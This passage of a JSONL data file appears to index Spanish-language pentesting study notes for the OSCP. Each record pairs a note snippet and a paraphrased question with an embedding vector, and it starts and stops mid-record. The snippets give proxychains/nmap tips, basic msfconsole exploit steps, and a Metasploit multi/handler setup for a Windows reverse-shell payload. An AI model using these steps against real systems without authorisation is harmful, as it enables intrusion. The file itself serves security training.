0.02567, 0.05321, -0.03023, -0.03826, 0.05453, 0.0045, 0.03955, 0.0375, 0.01063, -0.00563, 0.03641, -0.06929, 0.00125, 0.01496, 0.01155, -0.02428, -0.03377, -0.04062, -0.00598, 0.07176, -0.03068, 0.01807, 0.00351, -0.02756, -0.07139, 0.02018, 0.00914, -0.03438, -0.00717, 0.03525, 0.03372, -0.05268, 0.01154, 0.03096]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## proxychains\n- `proxychains nmap -sT -Pn IP` β†’ usa `-sT` (TCP connect): el SYN scan **no** pasa por el proxy. Ver Nmap NSE.\n\nRelacionado: Pivoting ligolo-ng Β· Movimiento lateral Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "con quΓ© herramienta debo ejecutar Nmap para asegurar que el trΓ‘fico pase por mis proxies?", "v": [-0.05199, 0.01177, -0.13309, -0.1124, 0.08421, -0.05264, 0.04604, 0.05749, -0.07277, 0.00245, -0.05554, 0.02717, 0.04635, -0.03109, 0.01535, 0.00511, 0.03966, -0.03056, 0.04318, 0.04814, -0.04416, 0.00433, -0.08985, -0.07173, -0.01787, -0.01685, -0.09292, 0.02097, -0.34377, 0.03685, -0.14071, 0.05171, 0.17072, -0.11758, 0.03914, -0.05705, 0.05798, -0.02226, -0.01824, -0.0263, -0.02245, -0.04222, -0.08108, 0.04148, 0.00603, -0.08283, -0.11439, -0.05042, -0.03751, -0.09279, 0.01741, -0.12814, -0.21572, -0.03889, -0.02522, -0.11736, 0.12421, -0.08801, -0.00525, -0.06255, 0.00802, 0.02572, -0.02382, -0.1133, 0.00947, -0.13813, 0.0684, -0.06301, -0.0989, 0.0526, 0.06081, 0.06529, 0.0633, 0.1207, 0.01789, -0.1195, 0.04187, 0.0675, 0.04018, 0.09799, 0.12712, 0.06026, -0.17667, 0.0152, -0.01706, -0.01729, -0.00129, 0.01632, 0.10945, 0.00837, -0.05061, 0.04796, -0.02365, 0.0247, 0.07344, 0.01323, 0.0119, -0.09115, -0.01421, -0.01054, 0.18172, -0.04206, -0.17277, 0.04281, -0.00072, 0.00892, -0.01744, 0.02222, -0.01826, 0.08893, 0.05746, 0.07264, -0.00969, -0.06107, 0.05173, 0.02876, -0.04118, -0.02686, -0.05662, -0.0437, 0.02144, 0.08937, -0.07272, -0.02572, 0.0094, 0.03381, -0.04754, 0.13353, 0.0172, -0.07335, 0.00277, -0.04251, -0.04887, -0.05517, -0.07596, 0.01852, 0.03375, -0.16383, 0.02021, -0.0051, 0.07368, -0.06142, 0.02175, -0.05021, 0.00673, 0.05207, -0.02777, -0.00403, -0.01801, -0.0002, 0.04528, -0.06396, -0.01512, 0.02227, 0.02565, 0.01528, -0.02243, 0.02874, -0.05391, 0.01489, -0.03786, -0.01441, 0.02594, 0.03672, 0.03451, 0.02194, 0.01298, 0.00182, 0.05073, 0.03358, 0.0543, -0.01007, 0.0695, -0.11256, -0.00248, -0.08293, -0.08857, -0.02843, 0.0321, -0.06377, -0.00594, -0.03015, -0.03048, 0.00808, 0.01309, 0.01126, -0.02015, 0.0337, 0.00838, 0.08506, -0.06634, 0.07095, 0.03353, -0.07115, 0.00951, 0.01628, 0.02586, -0.07185, -0.02266, -0.03654, 0.00115, -0.08442, 0.04111, 0.00882, -0.02506, 0.04258, 0.0116, -0.00872, -0.00463, 0.0581, 0.06464, 0.01233, 0.00639, -0.02407, 0.00355, -0.04503, -0.01574, 0.03056, 0.01577, 0.01785, 0.00861, 0.0282, 0.00218, -0.01561, -0.06732, -0.0298, 0.00516, 0.0198, 0.05023, -0.03146, 0.01541, 0.00178, -0.01293, -0.00534, -0.0101, -0.03959, -0.02805, -0.05244, -0.03946, -0.0529, -0.00042, 0.02208, -0.01033, -0.08148, -0.0086, -0.04317, -0.01543, -0.0491, -0.02159, -0.06447, -0.00696, 0.011, 0.06837, -0.04545, 0.0334, -0.03899]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## proxychains\n- `proxychains nmap -sT -Pn IP` β†’ usa `-sT` (TCP connect): el SYN scan **no** pasa por el proxy. Ver Nmap NSE.\n\nRelacionado: Pivoting ligolo-ng Β· Movimiento lateral Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "cual es la forma correcta de pasar mΓΊltiples proxies al escanear puertos con una herramienta de red?", "v": [0.09531, -0.0438, -0.14687, -0.06337, 0.04679, -0.04766, 0.15264, -0.15113, -0.07415, -0.10599, -0.11682, 0.05949, 0.0886, -0.14764, 0.11908, -0.03013, -0.01063, -0.04759, 0.02635, 0.06239, -0.03966, -0.07915, -0.1244, -0.00835, -0.0366, 0.05635, 0.05411, 0.01678, -0.15068, 0.06139, -0.02465, 0.11138, 0.06722, -0.07205, -0.0441, -0.10207, -0.02159, 0.04396, 0.01279, 0.03048, -0.02701, -0.02142, -0.10772, -0.05358, -0.00109, 0.00016, -0.12397, 0.0842, 0.01284, 0.01558, -0.03419, -0.12461, -0.18663, 0.01383, -0.01783, -0.13232, 0.12128, 0.00193, -0.07137, -0.07776, -0.03372, 0.1057, -0.05447, -0.02708, -0.05778, -0.08503, -0.01595, 0.00798, -0.07392, -0.01268, 0.04685, 0.05341, -0.00798, 0.07971, 0.00407, -0.02986, -0.01063, 0.07098, 0.06724, 0.11389, 0.04478, -0.0576, -0.0949, -0.00565, -0.04112, -0.11853, -0.03844, -0.04303, 0.00957, -0.10448, -0.00681, -0.05043, 0.00055, 0.03545, 0.04394, -0.0882, 0.02917, -6e-05, -0.06024, -0.02504, 0.13135, 0.02174, -0.14302, 0.05236, -0.04444, 0.01489, -0.049, -0.05342, 0.05216, 0.04321, 0.11227, -0.0128, 0.06179, -0.05124, -0.03131, 0.02014, -0.04681, -0.08292, 0.0015, -0.0236, 0.01602, -0.07756, -0.10196, -0.01636, 0.03754, -0.00115, -0.03147, 0.08694, 0.07052, -0.01979, -0.01848, -0.03359, -0.04847, -0.06761, -0.08742, -0.04288, 0.07547, -0.17532, -0.0281, -0.09794, -0.00741, 0.05978, -0.04346, -0.14086, 0.02592, 0.08276, 0.03669, -0.03194, -0.0706, -0.00485, -0.03288, 0.03273, -0.0245, 0.02485, -0.04219, 0.09133, 0.03382, 0.0098, -0.06901, 0.0838, -0.06509, -0.04495, 0.02967, 0.00297, 0.00236, -0.10376, 0.00803, -0.00738, 0.0745, -0.04676, 0.01202, 0.07536, -0.07356, -0.07086, 0.00286, -0.05718, -0.06443, -0.08919, 0.00133, -0.12908, -0.01807, 0.06042, -0.06628, -0.03447, -0.02402, -0.0954, -0.00511, -0.02764, -0.02012, 0.07454, -0.00606, 0.03056, -0.03285, -0.08054, 0.02267, 0.0309, 0.01297, -0.01365, 0.01908, -0.05031, -0.00807, 0.04395, 0.02602, -0.05358, 0.06147, 0.08988, -0.07794, 0.029, 0.00182, 0.06218, 0.01542, -0.0261, 0.03204, -0.03773, -0.01937, -0.03793, 0.00259, 0.03017, 0.00789, 0.03481, -0.00034, 0.0155, 0.04926, 0.02143, -0.07796, 0.03447, 0.05883, 0.05134, 0.02459, 0.03135, 0.04172, 0.00415, -0.03184, -0.0326, 0.0029, 0.01012, 0.06652, -0.01222, -0.03916, -0.0537, 0.06286, 0.00921, -0.02259, -0.022, 0.04725, -0.04553, -0.06359, -0.00776, 0.03548, -0.05826, -0.04252, 0.07481, 0.02069, -0.07942, 0.04376, -0.07437]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Metasploit\n\n> ⚠️ **En el examen: solo en UNA mΓ‘quina, y solo el foothold inicial cuenta como \"uso\"** (la post-explotaciΓ³n con meterpreter no cuenta). Ver Reglas de herramientas. Fuente: oscp.trastero.org/metasploit.", "indexar": "que programa es para explotar vulnerabilidades en una sola mΓ‘quina?", "v": [0.15671, -0.00393, -0.11262, -0.10392, -0.08871, -0.04045, -0.05971, -0.06862, -0.00743, -0.09513, -0.03296, -0.06567, 0.03339, 0.01881, -0.02785, 0.02233, -0.01311, -0.12467, 0.02815, 0.06172, -0.02002, -0.01661, -0.01112, -0.09668, -0.03892, 0.10419, -0.01178, -0.01908, -0.09885, 0.01118, -0.04687, 0.02019, 0.11712, -0.1215, 0.05953, 0.07624, 0.00115, -0.0191, 0.1249, 0.00279, 0.12062, 0.01992, -0.07371, 0.03045, 0.18711, -0.01608, 0.07047, -0.08445, 0.04075, 0.04344, -0.07967, -0.02569, -0.07089, 0.00563, 0.1297, -0.1197, 0.09699, -0.09604, -0.05397, 0.08732, -0.03532, 0.05346, 0.05632, -0.07863, 0.00599, -0.01221, 0.03302, 0.03601, -0.09813, 0.09425, -0.0044, -0.02837, -0.01594, 0.01395, 0.06285, -0.00164, -0.0159, -0.02467, 0.00105, -0.01482, -0.04612, 0.02518, 0.02938, 0.08055, -0.14979, -0.06331, 0.16872, 0.01173, 0.03855, -0.05263, 0.10207, 0.05367, -0.04247, 0.01455, 0.11219, -0.0999, 0.20728, 0.00926, 0.01249, 0.06032, 0.01147, -0.06312, -0.01538, 0.1254, -0.00735, 0.14902, 0.02693, 0.01428, -0.01418, -0.07121, -0.02312, -0.02924, -0.03587, -0.08424, -0.06797, 0.01191, -0.06879, -0.0212, 0.03057, -0.08997, -0.09785, 0.0061, 0.03354, -0.04671, 0.05927, -0.03046, -0.06906, 0.1045, -0.04627, -0.0215, 0.02157, 0.03668, 0.02209, 0.07597, -0.01792, -0.02182, 0.06383, -0.09003, -0.02765, -0.08407, 0.07427, 0.09281, 0.00913, 0.00094, 0.00984, 0.05909, 0.0579, -0.10413, -0.0249, 0.03821, 0.06295, -0.03747, 0.01024, 0.0711, -0.11363, -0.00525, -0.04345, 0.04734, -0.05283, 0.08135, -0.03569, 0.00766, -0.09662, 0.00531, 0.0563, 0.03666, 0.04549, 0.00537, 0.08173, 0.04822, -0.00075, 0.08551, 0.169, 0.04384, 0.01202, -0.0241, 0.0305, -0.06051, 0.00804, -0.0287, -0.08234, 0.01771, 0.03796, -0.04456, -0.05871, 0.04408, -0.00622, 0.02272, 0.05077, -0.00272, 0.02788, -0.05139, -0.05245, 0.07052, 0.06134, -0.02664, -0.02228, 0.04634, 0.02775, -0.0756, -0.0975, 0.00904, -0.06053, 0.00525, 0.08531, 0.1343, -0.02296, -0.0742, -0.03478, 0.08952, 0.02648, 0.00717, 0.06924, -0.04707, -0.10594, -0.03407, 0.00604, 0.10883, 0.00585, 0.02118, 0.00872, -0.03183, 0.03385, 0.05547, -0.00115, -0.05274, 0.00195, 0.01311, 0.0734, 0.05484, -0.01821, -0.02354, -0.02902, -0.03205, 0.02744, -0.00868, 0.02464, -0.0176, -0.03776, -0.05971, -0.00896, 0.05174, 0.04651, -0.06783, -0.02653, -0.00564, -0.04131, 0.03123, 0.00911, -0.01313, -0.06735, 0.05503, 0.02532, -0.06806, 0.0455, -0.00662]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Metasploit\n\n> ⚠️ **En el examen: solo en UNA mΓ‘quina, y solo el foothold inicial cuenta como \"uso\"** (la post-explotaciΓ³n con meterpreter no cuenta). Ver Reglas de herramientas. Fuente: oscp.trastero.org/metasploit.", "indexar": "cual herramienta sirve para obtener un foothold inicial sin contar como post-explotaciΓ³n?", "v": [-0.05378, 0.07741, -0.20627, -0.14767, 0.02606, -0.23896, -0.02492, 0.00722, -0.083, -0.02998, -0.13896, -0.0865, 0.03601, 0.03455, 0.04432, 0.00562, 0.09283, -0.14559, -0.0557, -0.00973, -0.12238, 0.06992, 0.02877, -0.09612, -0.17844, -0.01388, 0.01532, -0.03317, -0.17224, 0.04459, 0.06862, 0.04637, 0.01417, -0.08431, -0.05278, -0.0426, -0.03794, -0.00996, -0.06278, 0.02882, -0.06217, -0.00356, -0.04475, 0.04406, 0.01901, -0.03187, -0.04299, 0.08123, -0.06108, 0.09266, 0.04038, -0.06462, -0.09575, -0.08242, -0.02229, -0.12033, 0.15759, -0.02918, -0.06491, 0.00911, -0.0358, -0.04056, -0.07031, -0.07435, 0.00896, -0.02612, 0.03702, 0.02468, -0.01959, 0.06238, 0.00228, 0.10161, -0.05766, -0.02096, 0.03311, 0.0407, 0.01252, 0.06638, 0.02489, -0.06174, 0.00126, -0.0047, -0.11866, 0.00176, -0.03502, -0.11776, 0.10334, -0.04649, 0.05791, -0.09104, 0.05601, 0.04171, -0.11485, -0.07571, -0.00879, -0.05854, 0.08751, 0.02358, -0.04867, -0.0129, 0.12215, -0.06973, -0.06539, 0.03336, 0.00916, 0.02977, 0.05122, -0.11038, -0.08688, -0.02944, 0.02385, -0.01188, -0.03471, 0.00464, -0.00791, 0.07162, -0.1731, -0.07558, -0.03257, -0.05807, 0.00804, 0.0085, -0.04839, -0.04246, 0.03778, -0.0924, -0.01375, 0.06469, 0.05746, 0.00334, -0.01167, -0.06228, -0.02831, 0.01964, -0.01111, -0.13035, 0.03729, -0.06854, -0.06654, -0.05414, 0.04992, 0.0331, -0.05043, -0.12468, 0.03597, 0.02069, 0.02487, -0.06768, 0.01823, -0.06981, 0.01637, -0.11026, 0.01262, 0.02724, -0.0322, -0.01873, -0.00295, 0.04173, -0.10121, 0.11243, 0.00084, -0.1101, 0.00945, 0.01155, 0.02991, -0.05248, 0.03402, -0.0312, 0.05971, 0.04683, -0.01492, -0.01228, 0.08964, 0.01724, -0.00978, -0.06136, -0.04856, 0.02664, 0.059, -0.07036, 0.00471, 0.0469, -0.05643, 0.0098, -0.00169, -0.01577, -0.04336, -0.02513, -0.02124, 0.03942, 0.1088, 0.05596, 0.0328, -0.04334, -0.00086, -0.04181, -0.0419, -0.00816, 0.07674, -0.05166, -0.03096, -0.01522, -0.05176, 0.01044, 0.08889, 0.01763, -0.05532, -0.00352, -0.0902, 0.05648, 0.04962, -0.06453, 0.05965, -0.06514, -0.04037, -0.08322, 0.05561, -0.05382, -0.02186, 0.02169, -0.00683, 0.04416, 0.05679, 0.00943, -0.02142, -0.01527, 0.05131, 0.01, -0.01358, -0.01787, -0.03876, 0.02246, -0.0759, 0.01571, -0.00813, -0.06518, 0.07798, -0.05247, -0.07841, -0.05905, 0.01504, 0.05505, -0.00814, -0.02097, -0.01482, -0.0543, -0.0034, 0.0359, -0.00116, -0.0863, -0.0337, 0.01087, 0.07778, -0.05113, 0.04735, -0.03759]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## BΓ‘sico\n```\nmsfconsole -q\nsearch \nuse exploit/...\nshow options ; set RHOSTS IP ; set LHOST TU_IP ; run\n```", "indexar": "quΓ© programa puedo usar para escanear vulnerabilidades y explotarlas?", "v": [0.05611, -0.01437, -0.19806, -0.06134, 0.0189, -0.0221, -0.02096, -0.14423, -0.08418, -0.03448, -0.12506, -0.09136, -0.08259, -0.00311, -0.06781, 0.0368, 0.00615, -0.0828, 0.04358, 0.04497, -0.03201, -0.06087, -0.08274, -0.07238, -0.12189, 0.10538, -0.06919, -0.039, -0.01904, -0.02662, -0.10601, 0.12623, 0.08113, -0.06573, 0.00576, 0.11428, 0.01859, -0.01822, 0.12414, 0.02384, 0.08332, 0.01849, -0.10144, -0.04398, 0.11458, -0.01115, -0.04291, -0.04518, -0.05459, 0.00594, -0.0534, -0.02481, -0.13768, -0.01833, 0.12005, -0.06619, 0.07706, -0.12939, -0.05135, 0.08236, -0.05069, 0.06937, 0.09375, -0.05485, 0.00804, -0.08871, 0.02393, 0.04655, -0.15044, 0.11805, -0.02346, 0.08372, 0.01266, 0.06719, 0.04333, 0.00446, -0.06123, -0.00999, 0.02963, 0.03815, -0.05298, 0.02532, 0.02214, 0.08591, -0.14781, -0.04245, 0.15475, -0.02355, 0.00626, -0.04407, 0.07009, 0.02437, -0.03851, 0.01211, 0.04422, -0.09652, 0.16858, 0.06556, -0.01965, 0.04936, -0.01221, -0.08212, -0.05527, 0.16316, 0.02461, 0.09375, -0.00441, -0.02699, -0.03149, -0.05538, -0.05193, -0.02848, -0.11262, -0.06957, -0.09845, 0.00753, -0.07532, -0.02633, 0.04154, -0.0687, -0.0528, -0.03263, 0.00818, -0.00895, 0.11198, -0.01373, 0.00405, 0.11084, -0.05837, 0.01968, -0.05214, -0.01838, 0.00725, -0.00027, -0.02705, -0.07377, 0.02757, -0.07231, -0.00666, -0.02754, 0.05487, 0.04639, -0.00134, 0.04212, -0.00102, 0.06548, 0.02611, -0.07372, -0.00643, -0.00333, 0.06573, -0.034, -0.03423, 0.07904, -0.08271, -0.03497, 0.03641, 0.02997, -0.03214, 0.06597, -0.06265, 0.0041, -0.00892, 0.03102, 0.06251, -0.04754, 0.05895, -0.01296, 0.02534, 0.09299, 0.05062, 0.12094, 0.1165, -0.03752, 0.07078, -0.06195, 0.01044, -0.04683, -0.02014, -0.06904, -0.07091, 0.00771, 0.02608, 0.00344, 0.01215, 0.03729, -0.00112, 0.0117, 0.0038, 0.05315, -0.015, 0.01652, 0.03254, 0.04356, 0.02431, -0.03852, 0.01397, -0.00409, -0.00307, -0.09111, -0.05225, 0.02257, -0.03905, -0.04631, 0.15763, 0.0923, -0.03771, -0.03346, 0.01496, 0.11479, 0.02672, -0.05671, 0.10487, -0.02566, -0.07187, -0.0209, 0.00962, 0.11564, 0.01409, -0.01253, 0.0064, 0.03284, 0.04772, 0.04834, 0.01076, -0.01648, -0.04442, -0.04404, 0.01191, 0.05406, 0.0015, -0.02051, -0.07689, -0.03614, 0.02337, -0.04827, 0.0262, -0.00147, -0.01345, -0.04789, -0.00099, 0.09578, -0.00929, -0.02957, -0.03511, -0.0241, -0.04996, 0.05802, 0.02205, -0.00498, -0.033, 0.05875, 0.03445, -0.11253, 0.03762, -0.00017]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## BΓ‘sico\n```\nmsfconsole -q\nsearch \nuse exploit/...\nshow options ; set RHOSTS IP ; set LHOST TU_IP ; run\n```", "indexar": "con quΓ© herramienta puedo probar si un servicio de una computadora especΓ­fica estΓ‘ vulnerable?", "v": [0.08095, 0.13042, -0.16012, -0.12274, -0.01021, -0.17782, -0.00119, 0.01072, -0.02098, -0.1489, -0.07972, -0.02615, -0.00176, -0.04521, -0.00683, 0.0485, 0.07707, -0.11264, 0.03994, 0.02927, 0.04, -0.07186, -0.10287, -0.02497, -0.03442, 0.01237, 0.0491, -0.01919, -0.12968, 0.00696, -0.06509, 0.01601, 0.12745, -0.06599, -0.05337, -0.0006, -0.05907, 0.04447, 0.09792, 0.04407, 0.09608, 0.00114, -0.03121, 0.06087, 0.13155, -0.0205, -0.05365, -0.06649, -0.03877, 0.07195, -0.09611, -0.11565, -0.13079, -0.06214, -0.01452, -0.0892, 0.12715, -0.11508, 0.11641, -0.07618, -0.06327, 0.08006, -0.02798, -0.02835, 0.0138, 0.01561, -0.02253, -0.05822, -0.12625, 0.05995, -0.04451, 0.02709, 0.06373, -0.08359, -0.01195, 0.00119, -0.03472, -0.00777, 0.10657, -0.06354, 0.03486, 0.03456, -0.09824, 0.02827, -0.13732, -0.18494, 0.05841, -0.01389, 0.05467, -0.07466, 0.12805, 0.10307, -0.04422, 0.05454, 0.09307, 0.03688, 0.15001, -0.01167, -0.05425, -0.02886, 0.15647, -0.04233, -0.08685, 0.16749, -0.07483, 0.03913, -0.01308, -0.02133, -0.02603, -0.13082, 0.05862, -0.01419, -0.04146, 0.00991, -0.06331, 0.00842, -0.02096, -0.00997, 0.00594, -0.03034, -0.02384, 0.04079, -0.01657, 0.01584, 0.04028, 0.0014, -0.01172, 0.04803, -0.05973, -0.0987, -0.02265, -0.0368, -0.09673, -0.00574, -0.04312, -0.00093, 0.00152, -0.16222, 0.01961, -0.04836, 0.04411, 0.06807, -0.02138, -0.05341, 0.04488, 0.05096, 0.05881, -0.03831, -0.1052, 0.01739, 0.01299, -0.01946, -0.00497, 0.0631, -0.08378, 0.02994, 0.00993, 0.02515, -0.07652, 0.03617, -0.08313, -0.00421, 0.04931, 0.02383, 0.00189, -0.01173, 0.01639, 0.02041, 0.08974, 0.04968, -0.09883, 0.01865, 0.04505, -0.02002, -0.00966, -0.04589, -0.06824, 0.01582, -0.04444, -0.06474, -0.0739, 0.02739, -0.01583, -0.06471, -0.04565, -0.02236, -0.00079, -0.01935, 0.00578, 0.03583, -0.02609, 0.01354, -0.00688, 0.00256, 0.0756, 0.00574, -0.05938, -0.01661, -0.0076, -0.0197, -0.10613, -0.01427, -0.06323, -0.02705, 0.03114, 0.09907, -0.01051, -0.01852, -0.01839, 0.07096, 0.00836, -0.01891, 0.06613, -0.02116, -0.0661, -0.02451, 0.03941, 0.00524, 0.01258, 0.01092, 0.05294, -0.05216, 0.06241, 0.01086, 0.0324, -0.01264, 0.0349, 0.03869, 0.00889, -0.04283, 0.02766, -0.02212, -0.03693, -0.0143, 0.01454, -0.01184, 0.04702, -0.04213, -0.10622, -0.00521, 0.01354, 0.0979, -0.01005, -0.07175, -0.00719, -0.04617, -0.03954, -0.03502, -0.06892, -0.08992, -0.02087, -0.00607, 0.04935, -0.07952, 0.00355, 0.0128]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## BΓ‘sico\n```\nmsfconsole -q\nsearch \nuse exploit/...\nshow options ; set RHOSTS IP ; set LHOST TU_IP ; run\n```", "indexar": "me ayudas a encontrar y ejecutar exploits contra una IP concreta?", "v": [0.12092, 0.00925, -0.25803, -0.105, 0.21058, -0.05895, 0.01972, 0.07368, -0.16211, 0.02954, 0.03489, -0.03026, -0.00194, 0.02513, -0.0989, -0.12809, 0.02572, -0.02408, 0.07577, -0.17194, 0.05953, 0.10728, -0.01267, -0.01722, -0.0706, 0.14237, -0.08113, 0.07984, -0.05928, -0.20938, -0.14937, -0.01973, -0.05597, -0.03946, -0.09423, -0.05751, 0.00298, 0.01165, 0.03197, 0.03237, 0.02294, -0.03566, -0.03669, -0.10641, 0.00632, 0.0305, -0.02098, 0.01796, -0.01922, -0.08188, -0.01649, -0.15588, -0.17163, -0.15649, -0.10045, -0.01782, 0.03227, -0.02082, -0.13022, -0.10015, -0.06825, -0.00225, -0.01298, -0.01539, 0.16218, 0.03546, -0.05334, -0.02261, -0.008, 0.04693, -0.02214, 0.03677, -0.02369, 0.06692, 0.0047, -0.10902, 0.03257, -0.0023, -0.02582, 0.00041, 0.02175, 0.02899, -0.06874, -0.0099, -0.0028, -0.01745, 0.02369, -0.09713, 0.00818, -0.12921, 0.02283, 0.03802, -0.09692, 0.00661, 0.00956, 0.00728, 0.06938, -0.04439, -0.00308, 0.00932, -0.05118, -0.10794, -0.1533, -0.01588, 0.12093, 0.07118, -0.02334, 0.07952, -0.04799, 0.02543, -0.03369, 0.02157, 0.0444, -0.04119, 0.03866, -0.02009, -0.02237, -0.11125, 0.03997, -0.10034, -0.05571, -0.01756, -0.07696, 0.07494, 0.02166, 0.07388, -0.0224, 0.0378, 0.03632, -0.03946, -0.02254, 0.00106, 0.10499, -0.02457, 0.00122, -0.00994, -0.00456, -0.06163, -0.03825, 0.02721, 0.12385, -0.03581, -0.01954, -0.01449, -0.00142, -0.05658, 0.00479, -0.05327, 0.02807, -0.02968, 0.10906, -0.04947, 0.05164, 0.04667, -0.07248, -0.01293, 0.0605, -0.00374, 0.0255, 0.06971, -0.00155, -0.00412, -0.01883, -0.07047, -0.00408, 0.01841, -0.07872, -0.01516, 0.03475, 0.04746, -0.01039, 0.02352, -0.01683, 0.02154, 0.02271, -0.0988, 0.0119, 0.0178, -0.00062, -0.00022, -0.03209, -0.03332, 0.06403, -0.0162, 0.04308, 0.02646, 0.04683, 0.00144, -0.02101, -0.01101, 0.0848, -0.03774, 0.04007, 0.05493, -0.01568, 0.00878, -0.0417, 0.03499, -0.03348, -0.15043, -0.02323, -0.04352, -0.02833, -0.05871, -0.01131, 0.01588, -0.0599, -0.02825, -0.05423, -0.01828, 0.03107, 0.0773, 0.01701, -0.04676, -0.13062, 0.02499, 0.04742, 0.06455, 0.00389, -0.04904, -0.04431, 0.02587, 0.02721, 0.001, 0.02934, 0.00639, 0.00429, -0.04186, -0.03661, -0.04625, -0.05321, -0.01761, 0.01048, -0.0332, -0.03873, -0.04093, -0.00596, -0.01694, 0.00367, 0.00918, 0.00428, 0.02976, 0.01824, -0.0473, -0.01951, -0.00949, -0.076, -0.03351, -0.03861, 7e-05, 0.02475, 0.02269, 0.03616, -0.0071, 0.05232, -0.00494]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## multi/handler (recibir un payload de msfvenom)\n```\nuse exploit/multi/handler\nset payload windows/shell_reverse_tcp # o windows/meterpreter/reverse_tcp\nset LHOST TU_IP ; set LPORT 443 ; run\n```", "indexar": "quΓ© programa sirve para recibir un payload de msfvenom?", "v": [0.09107, 0.02283, -0.12392, -0.07751, -0.03191, -0.04577, -0.02266, -0.08237, -0.09253, -0.03479, -0.08593, 0.0359, 0.09781, -0.05099, -0.08312, 0.12099, 0.07821, -0.0644, -0.0082, 0.07716, 0.05907, 0.02091, -0.05573, -0.07562, -0.05329, 0.20585, 0.0438, -0.0566, -0.16311, -0.01209, 0.16497, -0.0033, 0.02136, -0.06273, 0.05614, 0.00409, 0.05823, 0.10782, -0.01557, 0.11872, 0.08861, 0.02346, -0.08387, 0.02242, 0.10131, -0.0626, -0.00375, 0.03426, 0.03584, -0.03875, 0.00239, 0.06614, 0.04531, 0.08018, -0.05861, -0.0686, -0.01295, -0.132, -0.03441, 0.05653, -0.05648, 0.02559, -0.05382, -0.13946, -0.00242, -0.10315, 0.03212, 0.08227, -0.02926, -0.0775, -0.00122, -0.02689, 0.05568, -0.00502, -0.00803, 0.00673, -0.06562, 0.09543, 0.07018, 0.02611, 0.07276, -0.01873, -0.09392, 0.05881, -0.02828, 0.02603, 0.11216, 0.01762, 0.04849, -0.09141, 0.02841, 0.07302, -0.06298, 0.11752, 0.02086, -0.01979, 0.08076, -0.03867, 0.07053, 0.05887, 0.10155, -0.06102, 0.02442, 0.02889, 0.01224, 0.09029, 0.14359, -0.11392, -0.03255, 0.01845, 0.05496, -0.07763, -0.00371, -0.0209, -0.17349, -0.06603, -0.0199, 0.02531, 0.06612, 0.00109, -0.09218, 0.04311, -0.00041, 0.0636, 0.05626, -0.05233, -0.01898, 0.12208, -0.00829, 0.14684, -0.01532, 0.03619, -0.02609, 0.0213, -0.0391, -0.15173, 0.08984, -0.01425, -0.02085, 0.00796, 0.12749, 0.08776, 0.06993, 0.05991, 0.01682, -0.00429, 0.06165, -0.07388, -0.02795, -0.02217, 0.01654, -0.00222, 0.01045, -0.03554, -0.02805, -0.10406, 0.10806, -0.0024, -0.05598, 0.03595, -0.06833, 0.03829, -0.03504, -0.03309, 0.04076, -0.07307, -0.0321, -0.01813, 0.04003, 0.13927, -0.01333, 0.0121, 0.05414, -0.06014, -0.01033, -0.0194, -0.07853, -0.0752, 0.06822, 0.01806, -0.14173, 0.04869, 0.04866, 0.06306, -0.02471, -0.06608, -0.04696, 0.0328, 0.04001, 0.05016, 0.03378, 0.04498, -0.0011, -0.06104, -0.05938, -0.03085, -0.06118, 0.01278, 0.05789, -0.03864, 0.01289, -0.00367, 0.00103, -0.0266, -0.00768, 0.0424, -0.02584, 0.01694, 0.05032, 0.06938, 0.05082, -0.05096, 0.08385, -0.00258, -0.01728, -0.02513, -0.01997, 0.05225, 0.06625, 0.09795, 0.0218, -0.00305, 0.03409, 0.01705, -0.01606, -0.02268, 0.0626, 0.00848, 0.08507, 0.02796, 0.00367, -0.02107, -0.03193, 0.00218, 0.06186, -0.00264, 0.01519, 0.00379, -0.04781, -0.06234, -0.00033, 0.05613, -0.07088, -0.09655, 0.00282, -0.01929, -0.03212, 0.03032, -0.00572, 0.0258, -0.064, 0.07066, 0.01938, -0.02075, 0.05219, 0.05558]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## multi/handler (recibir un payload de msfvenom)\n```\nuse exploit/multi/handler\nset payload windows/shell_reverse_tcp # o windows/meterpreter/reverse_tcp\nset LHOST TU_IP ; set LPORT 443 ; run\n```", "indexar": "con quΓ© puedo montar una escucha reversa en Windows?", "v": [-0.00691, 0.12418, -0.15723, -0.01766, -0.1207, 0.05302, -0.10386, 0.04176, -0.05521, -0.21637, -0.03164, -0.09348, 0.0582, 0.00677, 0.00801, 0.03747, -0.00228, 0.02593, 0.04355, 0.02053, -0.00677, -0.17167, -0.01827, -0.0187, -0.01472, 0.073, 0.05253, -0.03122, -0.1224, -0.03164, 0.04695, 0.04271, 0.00143, 0.06201, -0.05452, 0.06451, -0.02482, 0.07281, 0.13926, 0.05175, 0.02822, 0.11306, 0.00458, 0.09789, 0.0758, -0.06397, 0.03072, -0.09818, 0.02023, 0.04966, -0.02636, 0.03767, -0.08071, -0.00836, 